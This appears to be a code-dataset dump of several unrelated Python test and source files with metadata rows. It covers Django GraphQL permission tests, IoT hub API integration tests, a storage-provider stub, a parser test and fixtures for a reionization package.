def test_obj_perm_required(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue ($id: GlobalID!) {
issueObjPermRequired (id: $id) {
id
name
}
}
"""
issue_no_perm = IssueFactory.create()
issue_with_perm = IssueFactory.create()
user = UserFactory.create()
if kind == "user":
user_with_perm = UserFactory.create()
assign_perm("view_issue", user_with_perm, issue_with_perm)
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
assign_perm("view_issue", group, issue_with_perm)
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
for issue in [issue_no_perm, issue_with_perm]:
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue.pk)},
asserts_errors=False,
)
assert res.data is None
assert res.errors == [
{
"message": "You don't have permission to access this resource.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueObjPermRequired"],
}
]
for u in [user, user_with_perm]:
# Superusers will have access to everything...
if kind == "superuser":
continue
with gql_client.login(u):
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue_no_perm.pk)},
asserts_errors=False,
)
assert res.data is None
assert res.errors == [
{
"message": "You don't have permission to access this resource.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueObjPermRequired"],
}
]
with gql_client.login(user_with_perm):
res = gql_client.query(query, {"id": to_base64("IssueType", issue_with_perm.pk)})
assert res.data == {
"issueObjPermRequired": {
"id": to_base64("IssueType", issue_with_perm.pk),
"name": issue_with_perm.name,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_obj_perm_required_global(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue ($id: GlobalID!) {
issueObjPermRequired (id: $id) {
id
name
}
}
"""
issue_no_perm = IssueFactory.create()
issue_with_perm = IssueFactory.create()
user = UserFactory.create()
if kind == "user":
user_with_perm = UserFactory.create()
user_with_perm.user_permissions.add(Permission.objects.get(codename="view_issue"))
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
group.permissions.add(Permission.objects.get(codename="view_issue"))
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
for issue in [issue_no_perm, issue_with_perm]:
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue.pk)},
asserts_errors=False,
)
assert res.data is None
assert res.errors == [
{
"message": "You don't have permission to access this resource.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueObjPermRequired"],
}
]
with gql_client.login(user):
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue.pk)},
asserts_errors=False,
)
assert res.data is None
assert res.errors == [
{
"message": "You don't have permission to access this resource.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueObjPermRequired"],
}
]
with gql_client.login(user_with_perm):
res = gql_client.query(query, {"id": to_base64("IssueType", issue_with_perm.pk)})
assert res.data == {
"issueObjPermRequired": {
"id": to_base64("IssueType", issue_with_perm.pk),
"name": issue_with_perm.name,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_obj_perm_required_optional(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue ($id: GlobalID!) {
issueObjPermRequiredOptional (id: $id) {
id
name
}
}
"""
issue_no_perm = IssueFactory.create()
issue_with_perm = IssueFactory.create()
user = UserFactory.create()
if kind == "user":
user_with_perm = UserFactory.create()
assign_perm("view_issue", user_with_perm, issue_with_perm)
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
assign_perm("view_issue", group, issue_with_perm)
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
for issue in [issue_no_perm, issue_with_perm]:
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue.pk)},
)
assert res.data == {"issueObjPermRequiredOptional": None}
for u in [user, user_with_perm]:
# Superusers will have access to everything...
if kind == "superuser":
continue
with gql_client.login(u):
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue_no_perm.pk)},
)
assert res.data == {"issueObjPermRequiredOptional": None}
with gql_client.login(user_with_perm):
res = gql_client.query(query, {"id": to_base64("IssueType", issue_with_perm.pk)})
assert res.data == {
"issueObjPermRequiredOptional": {
"id": to_base64("IssueType", issue_with_perm.pk),
"name": issue_with_perm.name,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_list_obj_perm_required(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue {
issueListObjPermRequired {
id
name
}
}
"""
IssueFactory.create()
issue_with_perm = IssueFactory.create()
user = UserFactory.create()
if kind == "user":
user_with_perm = UserFactory.create()
assign_perm("view_issue", user_with_perm, issue_with_perm)
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
assign_perm("view_issue", group, issue_with_perm)
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
res = gql_client.query(query)
assert res.data == {"issueListObjPermRequired": []}
with gql_client.login(user):
res = gql_client.query(query)
assert res.data == {"issueListObjPermRequired": []}
if kind == "superuser":
# Even though the user is a superuser, he doesn't have the permission
# assigned directly to him for the listing.
with gql_client.login(user_with_perm):
res = gql_client.query(query)
assert res.data == {"issueListObjPermRequired": []}
else:
with gql_client.login(user_with_perm):
res = gql_client.query(query)
assert res.data == {
"issueListObjPermRequired": [
{
"id": to_base64("IssueType", issue_with_perm.pk),
"name": issue_with_perm.name,
}
]
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_conn_obj_perm_required(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue {
issueConnObjPermRequired {
totalCount
edges {
node {
id
name
}
}
}
}
"""
IssueFactory.create()
issue_with_perm = IssueFactory.create()
user = UserFactory.create()
if kind == "user":
user_with_perm = UserFactory.create()
assign_perm("view_issue", user_with_perm, issue_with_perm)
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
assign_perm("view_issue", group, issue_with_perm)
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
res = gql_client.query(query)
assert res.data == {"issueConnObjPermRequired": {"edges": [], "totalCount": 0}}
with gql_client.login(user):
res = gql_client.query(query)
assert res.data == {"issueConnObjPermRequired": {"edges": [], "totalCount": 0}}
if kind == "superuser":
# Even though the user is a superuser, he doesn't have the permission
# assigned directly to him for the listing.
with gql_client.login(user_with_perm):
res = gql_client.query(query)
assert res.data == {"issueConnObjPermRequired": {"edges": [], "totalCount": 0}}
else:
with gql_client.login(user_with_perm):
res = gql_client.query(query)
assert res.data == {
"issueConnObjPermRequired": {
"edges": [
{
"node": {
"id": to_base64("IssueType", issue_with_perm.pk),
"name": issue_with_perm.name,
},
}
],
"totalCount": 1,
}
}
| 31.906332
| 97
| 0.569154
| 2,433
| 24,185
| 5.478011
| 0.05672
| 0.059424
| 0.052221
| 0.062725
| 0.936975
| 0.934124
| 0.92437
| 0.92377
| 0.92377
| 0.908538
| 0
| 0.007097
| 0.306678
| 24,185
| 757
| 98
| 31.948481
| 0.78775
| 0.018358
| 0
| 0.735964
| 0
| 0
| 0.206955
| 0.042571
| 0
| 0
| 0
| 0
| 0.112291
| 1
| 0.022762
| false
| 0
| 0.01214
| 0
| 0.034901
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c74c8d8d6c203ecbff197b759ffbb488ab2eec57
| 23,531
|
py
|
Python
|
app/test/integrationtest/test_hub.py
|
michalkoziara/IoT-RESTful-Webservice
|
ecb0f3e09cded3190f3646e5cd6c913056d94981
|
[
"bzip2-1.0.6"
] | 2
|
2021-09-24T02:45:32.000Z
|
2021-11-15T09:44:44.000Z
|
app/test/integrationtest/test_hub.py
|
PKramek/IoT-RESTful-Webservice-1
|
ecb0f3e09cded3190f3646e5cd6c913056d94981
|
[
"bzip2-1.0.6"
] | null | null | null |
app/test/integrationtest/test_hub.py
|
PKramek/IoT-RESTful-Webservice-1
|
ecb0f3e09cded3190f3646e5cd6c913056d94981
|
[
"bzip2-1.0.6"
] | 1
|
2021-09-11T11:47:32.000Z
|
2021-09-11T11:47:32.000Z
|
import base64
import hashlib
import json
import pytest
from app.main.repository.sensor_reading_repository import SensorReadingRepository
from app.main.util.constants import Constants
def test_get_states_should_return_keys_of_updated_devices_when_valid_request(
client,
get_device_group_default_values,
insert_device_group,
get_executive_device_default_values,
insert_executive_device,
get_sensor_default_values,
insert_sensor,
insert_deleted_device):
content_type = 'application/json'
product_key = 'product_key'
sensor_key = 'sensor device key'
executive_device_key = 'executive device key'
password = "password"
device_group_password = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
authorization_bytes = (product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
device_group_values = get_device_group_default_values()
device_group_values['product_key'] = product_key
device_group_values['user_id'] = None
device_group_values['password'] = device_group_password
test_device_group = insert_device_group(device_group_values)
sensor_values = get_sensor_default_values()
sensor_values['is_assigned'] = False
sensor_values['device_key'] = sensor_key
sensor_values['user_group_id'] = None
sensor_values['device_group_id'] = test_device_group.id
insert_sensor(sensor_values)
executive_device_values = get_executive_device_default_values()
executive_device_values['is_assigned'] = False
executive_device_values['device_key'] = executive_device_key
executive_device_values['user_group_id'] = None
executive_device_values['device_group_id'] = test_device_group.id
executive_device_values['formula_id'] = None
insert_executive_device(executive_device_values)
deleted_device = insert_deleted_device()
response = client.get('/api/hubs/' + product_key + '/states', content_type=content_type,
headers={"Authorization": authorization})
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['isUpdated']
assert response_data['isDeleted']
assert response_data['changedDevices']
assert response_data['deletedDevices']
assert len(response_data['changedDevices']) == 2
assert len(response_data['deletedDevices']) == 1
assert response_data['changedDevices'][0] == executive_device_key
assert response_data['changedDevices'][1] == sensor_key
assert response_data['deletedDevices'][0] == deleted_device.device_key
def test_get_states_should_return_bad_request_message_when_invalid_request(
client,
get_device_group_default_values,
insert_device_group):
content_type = 'application/json'
product_key = 'product_key'
device_group_values = get_device_group_default_values()
device_group_values['product_key'] = product_key
device_group_values['user_id'] = None
test_device_group = insert_device_group(device_group_values)
response = client.get('/api/hubs/' + 'not' + product_key + '/states',
content_type=content_type,
headers={"Authorization": "Basic not" + test_device_group.password}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
error_message = Constants.RESPONSE_MESSAGE_PRODUCT_KEY_NOT_FOUND
assert error_message == response_data['errorMessage']
def test_create_device_should_add_unconfigured_device_to_device_group_when_valid_request(
client,
get_unconfigured_device_default_values,
insert_unconfigured_device,
get_device_group_default_values,
insert_device_group):
content_type = 'application/json'
product_key = 'product_key'
device_key = 'test device key'
password = "password"
authorization_bytes = (product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
device_group_values = get_device_group_default_values()
device_group_values['product_key'] = product_key
device_group_values['user_id'] = None
device_group_values['password'] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
device_group = insert_device_group(device_group_values)
unconfigured_device_values = get_unconfigured_device_default_values()
unconfigured_device_values['device_key'] = device_key
unconfigured_device_values['device_group_id'] = None
unconfigured_device = insert_unconfigured_device(unconfigured_device_values)
assert unconfigured_device.device_group_id is None
response = client.post('/api/hubs/' + product_key + '/devices',
data=json.dumps({'deviceKeys': [device_key]}),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 201
assert unconfigured_device.device_group_id == device_group.id
def test_create_device_should_return_error_message_when_mimetype_is_not_json(client):
content_type = 'text'
product_key = 'test product key'
device_key = 'test device key'
response = client.post('/api/hubs/' + product_key + '/devices',
data=json.dumps({'deviceKeys': [device_key]}),
content_type=content_type,
headers={"Authorization": "test"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
error_message = Constants.RESPONSE_MESSAGE_BAD_MIMETYPE
assert response_data['errorMessage'] == error_message
@pytest.mark.parametrize("request_data, error_message", [
(json.dumps(dict(test='test')), Constants.RESPONSE_MESSAGE_BAD_REQUEST),
("{/fe/", 'Failed to decode JSON object')])
def test_create_device_should_return_error_message_when_bad_request(
client,
request_data,
error_message):
content_type = 'application/json'
product_key = 'product_key'
response = client.post('/api/hubs/' + product_key + '/devices',
data=request_data,
content_type=content_type,
headers={"Authorization": "password"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert error_message in response_data['errorMessage']
def test_create_device_should_return_error_message_when_invalid_request_values(
client,
get_unconfigured_device_default_values,
insert_unconfigured_device,
get_device_group_default_values,
insert_device_group):
content_type = 'application/json'
product_key = 'test product key'
device_key = 'test device key'
password = "password"
authorization_bytes = (product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
device_group_values = get_device_group_default_values()
device_group_values['product_key'] = product_key
device_group_values['user_id'] = None
device_group_values['password'] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
insert_device_group(device_group_values)
unconfigured_device_values = get_unconfigured_device_default_values()
unconfigured_device_values['device_key'] = device_key
unconfigured_device_values['device_group_id'] = None
unconfigured_device = insert_unconfigured_device(unconfigured_device_values)
assert unconfigured_device.device_group_id is None
invalid_device_key = 'invalid ' + device_key
response = client.post('/api/hubs/' + product_key + '/devices',
data=json.dumps({'deviceKeys': [invalid_device_key]}),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
error_message = Constants.RESPONSE_MESSAGE_PARTIALLY_WRONG_DATA
assert response_data['errorMessage'] == error_message
def test_set_devices_states_should_update_devices_when_valid_request(
client,
get_device_group_default_values,
insert_device_group,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type):
content_type = 'application/json'
password = "password"
device_group_values = get_device_group_default_values()
device_group_values["password"] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
device_group = insert_device_group(device_group_values)
authorization_bytes = (device_group.product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = 'Decimal'
executive_type_values['state_range_min'] = 0
executive_type_values['state_range_max'] = 1.0
insert_executive_type(executive_type_values)
executive_device = insert_executive_device()
device_state_to_set = 0.5
device_states = [
{
"deviceKey": executive_device.device_key,
"state": device_state_to_set,
"isActive": True
}
]
data_json = {'devices': device_states}
assert executive_device.is_active
assert executive_device.state != device_state_to_set
response = client.post('api/hubs/' + device_group.product_key + '/states',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 201
assert executive_device.state == device_state_to_set
assert executive_device.is_active
def test_set_devices_states_should_update_devices_when_partially_valid_request(
client,
get_device_group_default_values,
insert_device_group,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type):
content_type = 'application/json'
password = "password"
device_group_values = get_device_group_default_values()
device_group_values["password"] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
device_group = insert_device_group(device_group_values)
authorization_bytes = (device_group.product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = 'Decimal'
executive_type_values['state_range_min'] = 0
executive_type_values['state_range_max'] = 1.0
insert_executive_type(executive_type_values)
executive_device = insert_executive_device()
device_state_to_set = -0.5
device_states = [
{
"deviceKey": executive_device.device_key,
"state": device_state_to_set,
"isActive": True
}
]
data_json = {'devices': device_states}
assert executive_device.is_active
assert executive_device.state != device_state_to_set
response = client.post('api/hubs/' + device_group.product_key + '/states',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert Constants.RESPONSE_MESSAGE_PARTIALLY_WRONG_DATA == response_data['errorMessage']
assert executive_device.state != str(device_state_to_set)
assert executive_device.is_active
def test_set_devices_states_should_return_error_message_when_wrong_request(
client):
content_type = 'application/json'
device_state_to_set = 0.5
device_states = [
{
"deviceKey": '1',
"state": device_state_to_set,
"isActive": False
}
]
data_json = {'not devices': device_states}
response = client.post('api/hubs/' + '1' + '/states',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": "password"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert Constants.RESPONSE_MESSAGE_BAD_REQUEST == response_data['errorMessage']
def test_set_devices_states_should_return_error_message_when_mimetype_is_not_json(
client):
content_type = 'test'
device_state_to_set = 0.5
device_states = [
{
"deviceKey": '1',
"state": device_state_to_set,
"isActive": False
}
]
data_json = {'not devices': device_states}
response = client.post('api/hubs/' + '1' + '/states',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": "password"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert Constants.RESPONSE_MESSAGE_BAD_MIMETYPE == response_data['errorMessage']
def test_get_devices_configurations_should_return_devices_configurations_when_valid_request(
client,
get_device_group_default_values,
insert_device_group,
get_executive_device_default_values,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type,
get_sensor_type_default_values,
insert_sensor_type,
insert_sensor,
insert_state_enumerator,
insert_sensor_reading_enumerator,
insert_formula):
content_type = 'application/json'
password = "password"
device_group_values = get_device_group_default_values()
device_group_values["password"] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
device_group = insert_device_group(device_group_values)
authorization_bytes = (device_group.product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = 'Decimal'
executive_type_values['state_range_min'] = 0
executive_type_values['state_range_max'] = 1.0
executive_type_values['default_state'] = 0.6
executive_type = insert_executive_type(executive_type_values)
executive_device_values = get_executive_device_default_values()
executive_device_values['is_formula_used'] = True
executive_device = insert_executive_device(executive_device_values)
assert executive_device.is_updated
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = 'Decimal'
sensor_type_values['range_min'] = -1
sensor_type_values['range_max'] = 2
insert_sensor_type(sensor_type_values)
sensor = insert_sensor()
assert sensor.is_updated
insert_sensor_reading_enumerator()
insert_state_enumerator()
insert_formula()
response = client.post(
'api/hubs/' + device_group.product_key + '/devices/config',
data=json.dumps(
{
"devices": [executive_device.device_key, sensor.device_key]
}
),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 200
response_data = json.loads(response.data.decode())
assert response_data
assert response_data['sensors']
assert response_data['devices']
assert len(response_data['sensors']) == 1
assert len(response_data['devices']) == 1
assert response_data['sensors'][0]['deviceKey'] == sensor.device_key
assert response_data['devices'][0]['deviceKey'] == executive_device.device_key
assert response_data['sensors'][0]['readingType'] == sensor_type_values['reading_type']
assert response_data['devices'][0]['stateType'] == executive_type_values['state_type']
assert response_data['devices'][0]['isFormulaUsed'] == executive_device.is_formula_used
assert response_data['devices'][0]['defaultState'] == executive_type.default_state
assert not executive_device.is_updated
assert not sensor.is_updated
def test_get_devices_configurations_should_return_error_message_when_invalid_request(client):
content_type = 'application/json'
response = client.post(
'api/hubs/' + 'invalid' + '/devices/config',
data=json.dumps('invalid'),
content_type=content_type,
headers={"Authorization": "password"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_BAD_REQUEST
def test_set_sensors_readings_should_update_sensors_when_valid_request(
client,
get_device_group_default_values,
insert_device_group,
get_sensor_type_default_values,
insert_sensor_type,
insert_sensor):
sensor_reading_repository_instance = SensorReadingRepository.get_instance()
content_type = 'application/json'
password = "password"
device_group_values = get_device_group_default_values()
device_group_values["password"] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
device_group = insert_device_group(device_group_values)
authorization_bytes = (device_group.product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = 'Decimal'
sensor_type_values['range_min'] = -1
sensor_type_values['range_max'] = 2
insert_sensor_type(sensor_type_values)
sensor = insert_sensor()
sensor_reading_value_to_be_set = 0.9
sensors_readings = [
{
"deviceKey": sensor.device_key,
"readingValue": sensor_reading_value_to_be_set,
"isActive": True
}
]
data_json = {'sensors': sensors_readings}
assert sensor.is_active
response = client.post('api/hubs/' + device_group.product_key + '/readings',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 201
created_sensor_reading = sensor_reading_repository_instance.get_sensor_readings_by_sensor_id(sensor.id)[0]
assert created_sensor_reading.value == sensor_reading_value_to_be_set
assert sensor.is_active
def test_set_sensors_readings_should_update_sensors_when_partially_valid_request(
client,
get_device_group_default_values,
insert_device_group,
get_sensor_type_default_values,
insert_sensor_type,
insert_sensor):
content_type = 'application/json'
password = "password"
device_group_values = get_device_group_default_values()
device_group_values["password"] = hashlib.sha224((password + Constants.SECRET_KEY).encode()).hexdigest()
device_group = insert_device_group(device_group_values)
authorization_bytes = (device_group.product_key + ":" + password).encode()
authorization = "Basic " + base64.b64encode(authorization_bytes).decode()
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = 'Decimal'
sensor_type_values['range_min'] = -1
sensor_type_values['range_max'] = 2
insert_sensor_type(sensor_type_values)
sensor = insert_sensor()
sensor_reading_value_to_be_set = 0.9
sensors_readings = [
{
"deviceKey": sensor.device_key,
"test": sensor_reading_value_to_be_set,
"isActive": True
}
]
data_json = {'sensors': sensors_readings}
assert sensor.is_active
response = client.post('api/hubs/' + device_group.product_key + '/readings',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": authorization}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert Constants.RESPONSE_MESSAGE_PARTIALLY_WRONG_DATA == response_data['errorMessage']
assert sensor.is_active
def test_set_sensors_readings_should_return_error_message_when_wrong_request(
client):
content_type = 'application/json'
sensor_reading_value_to_be_set = 0.9
sensors_readings = [
{
"deviceKey": '2',
"test": sensor_reading_value_to_be_set,
"isActive": False
}
]
data_json = {'not sensors': sensors_readings}
response = client.post('api/hubs/' + '1' + '/readings',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": "password"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert Constants.RESPONSE_MESSAGE_BAD_REQUEST == response_data['errorMessage']
def test_set_sensors_readings_should_return_error_message_when_mimetype_is_not_json(
client):
content_type = 'test'
sensor_reading_value_to_be_set = 0.9
sensors_readings = [
{
"deviceKey": '2',
"state": sensor_reading_value_to_be_set,
"isActive": False
}
]
data_json = {'sensors': sensors_readings}
response = client.post('api/hubs/' + '1' + '/readings',
data=json.dumps(data_json),
content_type=content_type,
headers={"Authorization": "password"}
)
assert response is not None
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert Constants.RESPONSE_MESSAGE_BAD_MIMETYPE == response_data['errorMessage']
if __name__ == '__main__':
pytest.main(['app/integrationtest/{}.py'.format(__file__)])
| 35.438253
| 110
| 0.688284
| 2,616
| 23,531
| 5.757263
| 0.053135
| 0.074497
| 0.038377
| 0.025098
| 0.874046
| 0.833809
| 0.807715
| 0.793506
| 0.773986
| 0.74092
| 0
| 0.008796
| 0.222133
| 23,531
| 663
| 111
| 35.491704
| 0.81403
| 0
| 0
| 0.690619
| 0
| 0
| 0.104118
| 0.001062
| 0
| 0
| 0
| 0
| 0.171657
| 1
| 0.031936
| false
| 0.063872
| 0.011976
| 0
| 0.043912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c7528f27b5dbdde44b1bd90ef18ad185f9e40001
| 746
|
py
|
Python
|
cookbook/provider/provider.py
|
mhoellmann/recipes
|
525aa4e4a4f218a47e1770498fff9fa8b0d7a097
|
[
"MIT"
] | null | null | null |
cookbook/provider/provider.py
|
mhoellmann/recipes
|
525aa4e4a4f218a47e1770498fff9fa8b0d7a097
|
[
"MIT"
] | 1
|
2020-04-11T09:47:20.000Z
|
2020-04-11T09:47:20.000Z
|
cookbook/provider/provider.py
|
mcejp/recipes
|
913d858473a1d44b2ced02e09fddfc4d320848b7
|
[
"MIT"
] | null | null | null |
class Provider:
@staticmethod
def import_all(monitor):
raise Exception('Method not implemented in storage provider')
@staticmethod
def create_share_link(recipe):
raise Exception('Method not implemented in storage provider')
@staticmethod
def get_share_link(recipe):
raise Exception('Method not implemented in storage provider')
@staticmethod
def get_base64_file(recipe):
raise Exception('Method not implemented in storage provider')
@staticmethod
def rename_file(recipe, new_name):
raise Exception('Method not implemented in storage provider')
@staticmethod
def delete_file(recipe):
raise Exception('Method not implemented in storage provider')
| 29.84
| 69
| 0.713137
| 85
| 746
| 6.141176
| 0.294118
| 0.229885
| 0.264368
| 0.264368
| 0.837165
| 0.837165
| 0.837165
| 0.837165
| 0.837165
| 0.837165
| 0
| 0.003436
| 0.219839
| 746
| 24
| 70
| 31.083333
| 0.893471
| 0
| 0
| 0.631579
| 0
| 0
| 0.337802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.315789
| false
| 0
| 0.052632
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c7798bbd899dbf7886ba2d1995233f23ca9e9892
| 141
|
py
|
Python
|
tests/parser/grounding.13.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.13.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.13.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(0). a(1).
b :- a(X), not c(X).
c(1) | c(0) :- b.
"""
output = """
a(0). a(1).
b :- a(X), not c(X).
c(1) | c(0) :- b.
"""
| 12.818182
| 21
| 0.319149
| 32
| 141
| 1.40625
| 0.28125
| 0.088889
| 0.133333
| 0.177778
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0
| 0.07767
| 0.269504
| 141
| 10
| 22
| 14.1
| 0.359223
| 0
| 0
| 0.8
| 0
| 0
| 0.77037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c77f58b289c314454ff366f21013a6902056c0ea
| 13,318
|
py
|
Python
|
tests/test_zreion.py
|
plaplant/zreion
|
78c97ef02418a58a314128e1a8e696db6f12b671
|
[
"MIT"
] | null | null | null |
tests/test_zreion.py
|
plaplant/zreion
|
78c97ef02418a58a314128e1a8e696db6f12b671
|
[
"MIT"
] | null | null | null |
tests/test_zreion.py
|
plaplant/zreion
|
78c97ef02418a58a314128e1a8e696db6f12b671
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Paul La Plante
# Licensed under the MIT License
"""Tests for zreion.zreion module."""
import pytest
import pytest_cases
import numpy as np
import zreion.zreion as zreion
@pytest.fixture
def fake_data_deterministic():
"""Define a fixture for fake data."""
is_random = False
data_shape = (8, 8, 8)
data = np.empty(data_shape, dtype=np.float32)
for i in range(data_shape[0]):
for j in range(data_shape[1]):
for k in range(data_shape[2]):
data[i, j, k] = 100 * i + 10 * j + k
return data, is_random
@pytest.fixture
def fake_data_random():
"""Define a fixture for fake data."""
is_random = True
data_shape = (8, 8, 8)
np.random.seed(8675309)
data = np.asarray(np.random.normal(size=data_shape), dtype=np.float32)
return data, is_random
@pytest.fixture
def fake_data_deterministic_anisotropic():
"""Define a fixture for fake data."""
is_random = False
data_shape = (13, 11, 9)
data = np.empty(data_shape, dtype=np.float32)
for i in range(data_shape[0]):
for j in range(data_shape[1]):
for k in range(data_shape[2]):
data[i, j, k] = i + 1.5 * j - k
return data, is_random
@pytest.fixture
def fake_data_random_anisotropic():
"""Define a fixture for fake data."""
is_random = True
data_shape = (13, 11, 9)
np.random.seed(8675309)
data = np.asarray(np.random.normal(size=data_shape), dtype=np.float32)
return data, is_random
# define cases decorator
fake_data_cases = pytest_cases.parametrize_plus(
"fake_data",
[
pytest_cases.fixture_ref(fake_data_deterministic),
